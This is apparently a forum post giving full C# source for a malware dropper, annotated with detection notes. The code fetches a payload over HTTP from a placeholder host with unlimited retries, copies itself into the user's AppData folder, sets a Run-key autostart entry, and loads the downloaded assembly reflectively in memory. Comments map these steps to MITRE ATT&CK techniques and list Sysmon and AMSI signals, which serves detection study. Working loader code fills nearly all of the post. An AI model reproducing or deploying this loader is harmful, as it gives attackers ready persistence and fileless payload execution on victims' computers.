
C# Dropper

Xzedin

C#:
using System;
using System.IO;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Threading;
using Microsoft.Win32;

// Analysis notes: the code below is a loader with three visible stages:
//   1. retrieval of a byte buffer over HTTP (DownloadPayload),
//   2. self-copy into the roaming AppData folder plus an HKCU Run-key
//      autostart entry (InstallPayload),
//   3. execution of the retrieved bytes as a managed assembly loaded from
//      memory (RunPayload).
// These correspond to MITRE ATT&CK T1105 (Ingress Tool Transfer), T1547.001
// (Registry Run Keys / Startup Folder) and T1620 (Reflective Code Loading).
namespace ioDrop
{
    class Program
    {
        /// <summary>
        /// Entry point. Fetches the remote buffer first, then attempts installation.
        /// When installation succeeds the process exits and the relaunched copy
        /// takes over; otherwise the buffer is executed in this process.
        /// </summary>
        /// <remarks>
        /// The download happens before the install check, so on a first run the
        /// buffer fetched here is discarded and the relaunched copy requests the
        /// same URL again. Network telemetry should therefore show the same GET
        /// from two different process images in short succession.
        /// The URL is a plain-HTTP literal, so the request and response are
        /// visible to proxy or IDS inspection without TLS interception.
        /// </remarks>
        public static void Main()
        {
            byte[] payloadBuffer = DownloadPayload(@"http://example.com/malware.exe");

            // The drop location is %APPDATA%\payload.exe (per-user and writable without elevation).
            // Despite the name, the file written there is a copy of this loader, not the download.
            if (InstallPayload(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\payload.exe"))
                Environment.Exit(0);
            else
                RunPayload(payloadBuffer);
        }

        /// <summary>
        /// Copies the running executable to <paramref name="dropPath"/>, registers that
        /// path under the current user's Run key and starts the copy.
        /// </summary>
        /// <param name="dropPath">Full path the loader should be copied to and started from.</param>
        /// <returns>
        /// <c>true</c> when the copy was written, registered and started;
        /// <c>false</c> when the process is already running from <paramref name="dropPath"/>
        /// or when any step threw an exception.
        /// </returns>
        /// <remarks>
        /// Observable artefacts, all created by the same process:
        /// a new executable file under the roaming AppData folder whose content equals the
        /// creating process image; a value under
        /// HKCU\Software\Microsoft\Windows\CurrentVersion\Run named after the file and pointing
        /// at it; and a child process started from that path. With Sysmon these surface as
        /// FileCreate (event 11), RegistryEvent value set (event 13) and ProcessCreate (event 1).
        /// Application-control policy that denies execution from user-writable profile
        /// directories stops the relaunch step.
        /// </remarks>
        private static bool InstallPayload(string dropPath)
        {
            // Only install when the current image is not already the dropped copy.
            // The comparison is case-insensitive on the full path of the main module.
            if (!Process.GetCurrentProcess().MainModule.FileName.Equals(dropPath, StringComparison.CurrentCultureIgnoreCase))
            {
                FileStream FS = null;
                try
                {
                    // CreateNew when the target is absent, Create (truncate and overwrite) when it exists.
                    if (!File.Exists(dropPath))
                        FS = new FileStream(dropPath, FileMode.CreateNew);
                    else
                        FS = new FileStream(dropPath, FileMode.Create);
                    // Reads this process's own executable from disk and writes it to the drop path.
                    byte[] loaderBuffer = File.ReadAllBytes(Process.GetCurrentProcess().MainModule.FileName);
                    FS.Write(loaderBuffer, 0, loaderBuffer.Length);
                    FS.Dispose();
                    // Per-user autostart: value name is the file name, value data is the full drop path.
                    // HKCU needs no administrative rights, so no UAC prompt is involved here.
                    Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run\").SetValue(Path.GetFileName(dropPath), dropPath);
                    Process.Start(dropPath);
                    return true;
                }
                catch
                {
                    // Every failure is swallowed; the caller then falls through to in-memory
                    // execution from the original location, so a blocked file or registry write
                    // does not by itself prevent the payload from running.
                    return false;
                }
            }
            return false;
        }

        /// <summary>
        /// Issues an HTTP GET to <paramref name="url"/> and returns the complete response body.
        /// </summary>
        /// <param name="url">Address to request.</param>
        /// <returns>The response body as a byte array.</returns>
        /// <remarks>
        /// Any exception leads to a five-second sleep followed by another attempt, with no
        /// retry limit. When the host is unreachable or blocked, this yields a steady request
        /// roughly every five seconds to the same URL, which is a usable beaconing signature.
        /// The code sets only the request method; it sets no User-Agent or other headers.
        /// Nothing here verifies the content (no hash, signature or length check), so whatever
        /// the server or an on-path party returns is handed to the caller unchanged.
        /// </remarks>
        private static byte[] DownloadPayload(string url)
        {
        redownload:
            try
            {
                HttpWebRequest httpRequest = (HttpWebRequest)WebRequest.Create(url);
                httpRequest.Method = WebRequestMethods.Http.Get;
                HttpWebResponse httpResponse = (HttpWebResponse)httpRequest.GetResponse();
                Stream httpResponseStream = httpResponse.GetResponseStream();

                // The body is buffered in memory only; this method writes nothing to disk.
                using (MemoryStream memoryStream = new MemoryStream())
                {
                    httpResponseStream.CopyTo(memoryStream);
                    httpResponse.Close();
                    httpResponseStream.Dispose();
                    return memoryStream.ToArray();
                }
            }
            catch
            {
                // Fixed 5000 ms back-off, then retry without limit.
                Thread.Sleep(5000);
                goto redownload;
            }
        }

        /// <summary>
        /// Loads <paramref name="payload"/> as a managed assembly from memory and invokes its
        /// entry point on a new thread.
        /// </summary>
        /// <param name="payload">Raw bytes of a .NET assembly.</param>
        /// <remarks>
        /// The assembly is loaded from a byte array, so on this path the downloaded content has
        /// no backing file for file-based scanning to inspect. Visibility has to come from the
        /// runtime instead: assembly-load events without a file path in .NET runtime ETW
        /// telemetry, and AMSI scanning of byte-array loads where the installed .NET Framework
        /// supports it (NOTE(review): 4.8 and later; confirm for the target estate).
        /// </remarks>
        private static void RunPayload(byte[] payload)
        {
            new Thread(() =>
            {
                try
                {
                    Assembly asm = AppDomain.CurrentDomain.Load(payload);
                    MethodInfo Metinf = asm.EntryPoint;
                    // NOTE(review): CreateInstance receives the entry method's name, not a type name,
                    // so this presumably returns null. Confirm; Invoke ignores the target for a static method.
                    object InjObj = asm.CreateInstance(Metinf.Name);
                    // One null argument when the entry point declares parameters, none otherwise.
                    object[] parameters = new object[1];
                    if (Metinf.GetParameters().Length == 0)
                    {
                        parameters = null;
                    }
                    Metinf.Invoke(InjObj, parameters);
                }
                // Load and invocation failures are discarded silently, so nothing is logged
                // or shown when the buffer is not a valid assembly.
                catch { }
            })
            // Foreground thread: the process stays alive for as long as the invoked entry point runs.
            { IsBackground = false }.Start();
        }
    }
}
 

